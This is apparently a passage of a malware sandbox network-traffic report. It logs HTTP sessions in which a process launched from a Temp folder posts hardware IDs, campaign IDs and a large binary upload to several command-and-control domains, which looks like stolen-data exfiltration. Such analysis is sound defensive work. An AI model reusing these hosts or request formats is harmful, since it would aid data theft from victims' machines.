                                                                                                                                                                                                                                                              2024-12-22 01:19:09 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:19:09 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=p62kehaae07ur3gn0kkequ0tsu; expires=Wed, 16 Apr 2025 19:05:48 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XmGNcDOLUV95VcSUvdagTbm19coWPqCfmR7UazXcsmKJ07RAVQ54iHrA2PqjOGBKZ%2BlhFlpMkyB1FvzmGOEPeuJ0W%2FDd6WTABSBaHNbGEBbmA3E0mNRG2uJt8jiOJhq27KcQe2s%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c48306bd29e16-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1958&min_rtt=1948&rtt_var=752&sent=12&recv=25&lost=0&retrans=0&sent_bytes=2844&recv_bytes=21458&delivery_rate=1435594&cwnd=189&unsent_bytes=0&cid=7b39b3395af40db7&ts=933&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:19:09 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                              2024-12-22 01:19:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              69192.168.2.450287104.21.21.99443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:19:08 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 82
                                                                                                                                                                                                                                                              Host: discokeyus.lat
                                                                                                                                                                                                                                                              2024-12-22 01:19:08 UTC82OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d 26 68 77 69 64 3d 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45
                                                                                                                                                                                                                                                              Data Ascii: act=get_message&ver=4.0&lid=PsFKDg--pablo&j=&hwid=F14195A540BC0B98AC8923850305D13E
                                                                                                                                                                                                                                                              2024-12-22 01:19:09 UTC1123INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:19:09 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=c208mnt82m652p1or68p3v5pp0; expires=Wed, 16 Apr 2025 19:05:48 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KtEkqvRkzSuPOkm4zaWce0B8LQHl2qE2ZI7s3%2BUKkoVmeMkQyz%2FZPg2lKM5z5F8LzFw8wzpF58wzHSzeQ5Mi8POhrTeCrYkwTpzKpTSKJhnr8COZv56PiWoIGF1pRcPmPw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c483158a342e4-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1703&min_rtt=1696&rtt_var=650&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=980&delivery_rate=1664766&cwnd=228&unsent_bytes=0&cid=de4a572e83eb149f&ts=789&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:19:09 UTC214INData Raw: 64 30 0d 0a 4c 4e 6f 6f 76 72 2f 6c 48 39 2b 42 51 5a 46 42 70 76 4c 2f 78 53 6d 57 46 6f 75 35 48 74 68 39 38 67 41 4e 36 47 4e 63 6a 6f 52 33 6f 51 72 4c 6e 64 38 39 74 2f 55 31 34 58 76 36 33 61 50 71 47 4b 34 6a 70 59 73 76 37 56 50 44 4d 54 37 47 55 6d 72 53 71 30 4f 38 54 75 4b 51 67 58 71 35 72 79 54 70 4a 49 54 65 33 61 4e 64 74 43 79 37 6c 54 79 39 58 38 67 77 63 4d 51 59 66 76 75 6d 46 76 68 41 79 73 75 56 4a 59 4f 75 48 62 35 77 6e 73 66 52 39 78 69 6a 4f 4c 71 49 4c 66 5a 4d 78 46 77 69 6d 78 63 35 37 2b 6c 77 39 56 72 66 30 59 46 77 73 71 38 6b 36 53 53 45 33 74 32 6a 58 62 51 73 75 35 55 38 76 56 2f 49 4d 48 43 31 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: d0LNoovr/lH9+BQZFBpvL/xSmWFou5Hth98gAN6GNcjoR3oQrLnd89t/U14Xv63aPqGK4jpYsv7VPDMT7GUmrSq0O8TuKQgXq5ryTpJITe3aNdtCy7lTy9X8gwcMQYfvumFvhAysuVJYOuHb5wnsfR9xijOLqILfZMxFwimxc57+lw9Vrf0YFwsq8k6SSE3t2jXbQsu5U8vV/IMHC1
                                                                                                                                                                                                                                                              2024-12-22 01:19:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              70192.168.2.450292104.21.67.146443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:19:10 UTC369OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=H8MK476HFNQALN9
                                                                                                                                                                                                                                                              Cookie: __cf_mw_byp=IjjBQ74NQR3Cy3LPi8f7NG.yiYgwJYrvuAxBctfN9tI-1734830334-0.0.1.1-/api
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 1414
                                                                                                                                                                                                                                                              Host: cheapptaxysu.click
                                                                                                                                                                                                                                                              2024-12-22 01:19:10 UTC1414OUTData Raw: 2d 2d 48 38 4d 4b 34 37 36 48 46 4e 51 41 4c 4e 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 48 38 4d 4b 34 37 36 48 46 4e 51 41 4c 4e 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 48 38 4d 4b 34 37 36 48 46 4e 51 41 4c 4e 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 5a 4a 76 73 73 2d 2d 67 65 6f 70 6f 78 69 64 0d 0a 2d 2d 48 38
                                                                                                                                                                                                                                                              Data Ascii: --H8MK476HFNQALN9Content-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--H8MK476HFNQALN9Content-Disposition: form-data; name="pid"1--H8MK476HFNQALN9Content-Disposition: form-data; name="lid"CZJvss--geopoxid--H8
                                                                                                                                                                                                                                                              2024-12-22 01:19:11 UTC1128INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:19:11 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=fnqkt533gih1050e2iacj58dni; expires=Wed, 16 Apr 2025 19:05:50 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vI9jfxAMccXs9k6Q9ofxZSVgu%2BBHRtUqZW5BH58be%2BkhZbFW3IjAFdBPSqAhdf9PtweB24WdeU7Fcpmv88K4gDR1ZNYvWoclpRp%2B0ixJzYgeRZCTHlpoP8MJv3B9lHbnPuNYxJE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c483eaf507ca6-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1993&min_rtt=1991&rtt_var=752&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=2419&delivery_rate=1449851&cwnd=236&unsent_bytes=0&cid=7515f981afe7013c&ts=788&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:19:11 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                              2024-12-22 01:19:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              71192.168.2.450298104.21.89.1154437796C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:19:13 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 77
                                                                                                                                                                                                                                                              Host: fieldhitty.click
                                                                                                                                                                                                                                                              2024-12-22 01:19:13 UTC77OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 76 62 41 72 5a 2d 2d 26 6a 3d 26 68 77 69 64 3d 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45
                                                                                                                                                                                                                                                              Data Ascii: act=get_message&ver=4.0&lid=PvbArZ--&j=&hwid=F14195A540BC0B98AC8923850305D13E
                                                                                                                                                                                                                                                              2024-12-22 01:19:14 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:19:13 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=0an7f4ng5ugntbbmd76avsjtls; expires=Wed, 16 Apr 2025 19:05:52 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kl%2Bv5fka7bmmMTusRK5NHfizDTxQgGT2V%2FMP630JbvUhav%2BcyiCSJ2PExc0r3JmqmfB9R%2BC4SjtJddEtxMYzhKthFqhlK%2B85dgfViBZWmY175eNk5QUMY4taofaZnCy%2BVRAU"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c484d9a521851-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1522&min_rtt=1517&rtt_var=579&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=977&delivery_rate=1871794&cwnd=214&unsent_bytes=0&cid=63798b8ea39d9148&ts=773&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:19:14 UTC54INData Raw: 33 30 0d 0a 43 61 73 62 35 69 67 51 41 4e 78 52 49 4c 53 2b 65 4b 44 61 32 58 2f 58 55 39 57 75 4e 6d 4b 45 77 62 39 6f 69 45 58 78 37 59 56 53 39 67 3d 3d 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 30Casb5igQANxRILS+eKDa2X/XU9WuNmKEwb9oiEXx7YVS9g==
                                                                                                                                                                                                                                                              2024-12-22 01:19:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              72192.168.2.450299104.21.67.146443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:19:13 UTC375OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=HK8Q66R5AINP05L0AVY
                                                                                                                                                                                                                                                              Cookie: __cf_mw_byp=IjjBQ74NQR3Cy3LPi8f7NG.yiYgwJYrvuAxBctfN9tI-1734830334-0.0.1.1-/api
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 300502
                                                                                                                                                                                                                                                              Host: cheapptaxysu.click
                                                                                                                                                                                                                                                              2024-12-22 01:19:13 UTC15331OUTData Raw: 2d 2d 48 4b 38 51 36 36 52 35 41 49 4e 50 30 35 4c 30 41 56 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 48 4b 38 51 36 36 52 35 41 49 4e 50 30 35 4c 30 41 56 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 48 4b 38 51 36 36 52 35 41 49 4e 50 30 35 4c 30 41 56 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 5a 4a 76 73 73 2d 2d 67 65
                                                                                                                                                                                                                                                              Data Ascii: --HK8Q66R5AINP05L0AVYContent-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--HK8Q66R5AINP05L0AVYContent-Disposition: form-data; name="pid"1--HK8Q66R5AINP05L0AVYContent-Disposition: form-data; name="lid"CZJvss--ge
                                                                                                                                                                                                                                                              2024-12-22 01:19:13 UTC15331OUTData Raw: cc a7 d1 b5 28 f8 9f 93 11 87 c2 8c 71 67 ce b8 54 17 32 d9 09 e3 7c dd 8f d2 6f fb fa d7 a4 c4 00 6f 1b 94 1e 8a 34 ab 45 2c 8f 26 bd bd aa 41 14 b5 ee c3 54 7d df 5d 5a e1 5b b4 76 38 a2 c1 d6 db 75 d4 61 8b 2e 62 48 b9 11 53 26 b4 05 b8 68 95 ab ad 9e 1f 90 e6 bd 5d 29 4e 66 39 75 d5 38 4a 6e 3a 22 2c 16 11 17 67 84 01 4e 25 10 6c 36 bb d1 83 cf 4e 26 0d 91 5e c4 b9 c5 66 44 ac a8 15 7a 7c 0d 50 0e b5 22 85 7f 70 7b c8 dd 95 95 ae 21 e4 30 54 2b 27 3f ef f1 b2 5e e5 8e a3 fc 55 cf 61 65 55 60 a3 55 80 1f 84 80 fa ad d0 f6 f0 61 b1 e1 b5 6b d5 8d 0c 7f 26 46 e9 32 c8 3e 1f cd 2e 5a 91 ab 3b ac c7 ac e7 1f 95 bf 7f b0 91 24 cc b5 44 f3 b8 9b 1d bc d5 69 3c b6 1b 6a fc e1 20 0a 66 24 cf 39 a0 c9 c5 f2 c4 35 5c 5f f9 b3 71 dc 5a 03 cc 2c e0 c4 6f 7d c0 fd
                                                                                                                                                                                                                                                              Data Ascii: (qgT2|oo4E,&AT}]Z[v8ua.bHS&h])Nf9u8Jn:",gN%l6N&^fDz|P"p{!0T+'?^UaeU`Uak&F2>.Z;$Di<j f$95\_qZ,o}
                                                                                                                                                                                                                                                              2024-12-22 01:19:13 UTC15331OUTData Raw: 16 a2 09 68 86 6a 75 da b1 7b aa d0 d5 47 95 2d b5 b7 8b 17 ad 03 59 76 16 96 ec 09 51 99 30 ba d7 1f e3 4e d6 ae a9 04 9e ba 06 1c 95 7f b0 3f 26 1f 92 ae 06 b1 c8 c9 d5 16 7d 3f 99 5b 14 8b ea 69 c8 ca e3 4d 9c c3 07 fa d4 33 93 08 45 f6 89 7a 16 ef 15 e6 79 81 51 45 f8 b2 e0 fd 87 45 99 d0 b1 1d eb 31 13 4e fc e3 e1 7c 65 e1 9a 74 a9 7a a8 8f 83 43 c3 db 89 04 be b4 1e c6 88 85 60 1d 0d 32 87 f5 d0 64 28 34 62 74 cf 08 74 12 84 10 17 45 21 c2 3d 77 18 be 06 72 41 4f a0 e2 b4 c5 57 8e c1 3c 38 31 cc dc c0 bd fc 5b d5 3b 13 3d 1f a1 60 06 b0 0d af 38 81 01 fb 12 be 31 00 03 d9 c6 c0 37 be 19 ab 92 0f 8c 0f 8e fa b8 00 2d 7e e9 d3 93 eb f4 85 8a 9e de f8 fb 46 9b 55 fd c3 ee c6 5a 1e f7 9c 58 23 59 15 f9 df a9 5a ca e0 97 06 12 79 07 9e e1 46 43 51 ed 79
                                                                                                                                                                                                                                                              Data Ascii: hju{G-YvQ0N?&}?[iM3EzyQEE1N|etzC`2d(4bttE!=wrAOW<81[;=`817-~FUZX#YZyFCQy
                                                                                                                                                                                                                                                              2024-12-22 01:19:13 UTC15331OUTData Raw: 95 3e 7f 26 bf 2c 39 3c 17 f0 fd 63 18 27 b1 5f 2e 5b 1e 5f b3 c7 7b e2 91 8c fb dc 6d d9 be 60 10 d5 18 1a ea c2 2a 2a dd 01 f4 fc 67 97 4b f2 4c 0b 05 c1 3a 4c 68 e7 d9 d9 cb 18 d9 90 57 c5 22 c7 80 98 ce 53 c6 ca f5 ca 59 40 e5 77 f2 5a 03 0c 00 d1 16 58 be 7a f2 92 08 2c 27 cb 20 2b 12 f0 15 08 1e 62 ba 7b 8a 94 e1 e9 ce b4 f6 c3 ec b6 90 e7 46 7b b3 16 eb f2 60 a6 56 b8 c9 50 4a c5 e2 92 2c ca fb a8 d8 5a 70 fd fb b1 50 97 dd 97 f9 f8 61 b1 77 e3 09 cf 6f 34 51 7e 72 97 9d dd 97 c8 04 9c 1f 2a c2 92 43 bd e3 8c ac 83 ef 0e 9b 28 13 36 e6 eb 8f a1 b8 b5 1e a9 17 ab 71 da a7 45 57 08 e5 7e 2a bc b6 66 38 25 6c 38 35 d3 89 64 08 39 6b 28 28 2e 7e f8 a2 7b 84 ca 9a c8 98 2d f0 1a c7 7c b4 30 63 b2 97 a2 a3 a1 06 b2 07 f4 bd 18 b8 81 c1 6a ea 52 5a ea 60
                                                                                                                                                                                                                                                              Data Ascii: >&,9<c'_.[_{m`**gKL:LhW"SY@wZXz,' +b{F{`VPJ,ZpPawo4Q~r*C(6qEW~*f8%l85d9k((.~{-|0cjRZ`
                                                                                                                                                                                                                                                              2024-12-22 01:19:13 UTC15331OUTData Raw: a9 ee 8f 85 e7 79 89 80 12 d4 a4 78 1d 4d 94 a5 75 3f 36 fc bd b1 8a 36 82 76 89 9f a4 e0 b8 b1 74 4f 53 0f e2 c3 bc 59 74 ba 3c 73 7b 0e 68 76 70 f4 8b 3d d2 6e 27 36 58 08 90 34 f7 1a d9 b5 77 c8 a4 8a e0 9f 01 48 2d a6 08 cb 72 29 d5 bc 05 f3 49 d1 6c db 01 7e 80 a1 99 99 67 a6 69 94 ce 7d bb 08 5b 79 7a 87 fc 27 d9 69 c5 3f 55 ed ba c6 a4 d3 d8 89 b4 a7 16 02 20 f7 7a f7 7b e9 8d a3 ac 88 a4 0c 8c b6 79 c4 d0 5c 08 df fc 87 97 52 ae ba 48 2f 8b ad 94 ab 43 bf a5 69 5a ea 45 1a 4a fb 3a 6f fd 86 b2 48 1e e7 aa 7a ec 8a ac d3 ac 5b f9 65 e9 14 ac b8 d6 ff fc 48 dd ef 19 56 f3 39 a5 86 f4 7b f5 a7 41 02 5c 7c 38 32 29 9d 8e 10 b3 2f b2 ea 3a 7a 23 07 e1 59 75 76 cd 95 24 a6 57 96 eb 81 2c 16 ec 96 a2 42 b2 06 3c 60 0c 92 b3 4d e5 45 84 0f 3f 17 83 3a 83
                                                                                                                                                                                                                                                              Data Ascii: yxMu?66vtOSYt<s{hvp=n'6X4wH-r)Il~gi}[yz'i?U z{y\RH/CiZEJ:oHz[eHV9{A\|82)/:z#Yuv$W,B<`ME?:
                                                                                                                                                                                                                                                              2024-12-22 01:19:13 UTC15331OUTData Raw: 45 d2 01 fd 08 22 ee 55 c5 91 ad ca 00 85 53 5a 7e be a6 59 88 4a 54 2f f5 1c ce 8f 1a aa c7 92 f7 84 7d 4a 2f d6 96 60 ca a4 18 3f ad 07 2d 7d 87 be 98 15 f1 e2 62 e6 74 6b 3d 58 f2 41 06 b9 9e 77 e0 9c d6 3f 11 49 d3 93 c1 dd 80 03 8a 23 3c 7f d9 8c 60 47 65 a1 a6 11 5e 33 58 88 1b c0 38 cd 40 df c0 cb 00 09 f3 68 60 08 8c 78 c2 22 60 1f fd 56 70 84 7b f4 ad 71 42 ee fa fb 75 c4 b8 29 c4 ae 98 89 9e 8e f7 7b 2c 94 54 65 d2 32 95 fb 8b 3a 82 42 61 5f 1c 8e 67 09 b9 1b ea 2d 63 16 46 4f 84 5e 47 bb 95 17 fd e2 cb 22 de e9 fd d6 5b eb b0 47 00 67 dd 5c aa 1c 57 c4 d3 f6 ff 2b b7 72 d5 86 8c ce 7e 68 0d d9 45 7f b8 26 d6 7c 3d fb 92 85 91 ad 8f 28 db b5 5e d9 5c 3b 91 f5 e3 f4 87 95 94 6f 74 c2 a5 15 37 8f 83 4b 9d a2 ac 92 3e 3b 2d 9f 01 81 fd fe 6b 73 2b
                                                                                                                                                                                                                                                              Data Ascii: E"USZ~YJT/}J/`?-}btk=XAw?I#<`Ge^3X8@h`x"`Vp{qBu){,Te2:Ba_g-cFO^G"[Gg\W+r~hE&|=(^\;ot7K>;-ks+
                                                                                                                                                                                                                                                              2024-12-22 01:19:13 UTC15331OUTData Raw: b7 d6 4e de 75 91 2d 5d 65 7d b3 77 ee b2 b8 fd 46 64 58 4a 3a ff 81 c9 39 5f c0 bb d0 c5 13 c1 cf d9 29 3d ac cc b5 b3 cc 3a 68 22 ab 58 65 c0 4a 94 fe 09 bc 9b 85 6e 0a b5 6f 97 54 19 9e 12 dc d7 e9 f9 b5 88 14 6e 2c 27 12 55 f5 15 4e 27 9e 88 a2 b0 d5 3a 7e c8 0c 76 a3 93 ee df 29 de 23 d8 b3 b5 2c 8f 7b 34 c6 25 ee 29 13 51 92 36 62 da d3 9e 0f 34 ef c0 95 a1 41 ec e2 da be ed 82 cc f0 56 dd cf c4 97 7e 0a 44 90 16 87 72 dd 61 b9 04 f5 c7 dc a1 c4 82 2a 07 51 cf c7 b1 3c 2e bb 29 af 19 ad a2 d9 aa 15 fb 7a 9d 2f c7 f0 0a 26 f2 2a 56 37 7a 4b 7e 15 59 12 07 08 8e 82 60 16 11 a7 4a 86 c2 d3 e7 53 c3 60 42 3c aa 4b aa 9b b1 99 e7 9d ba 7e b4 c2 08 d3 bc 4e c3 f3 1e d0 fa e2 04 31 9b d7 09 bf b6 0c 70 52 26 d7 52 fe 0d 43 7c 1d 06 25 55 ba 56 fb 87 08 20
                                                                                                                                                                                                                                                              Data Ascii: Nu-]e}wFdXJ:9_)=:h"XeJnoTn,'UN':~v)#,{4%)Q6b4AV~Dra*Q<.)z/&*V7zK~Y`JS`B<K~N1pR&RC|%UV
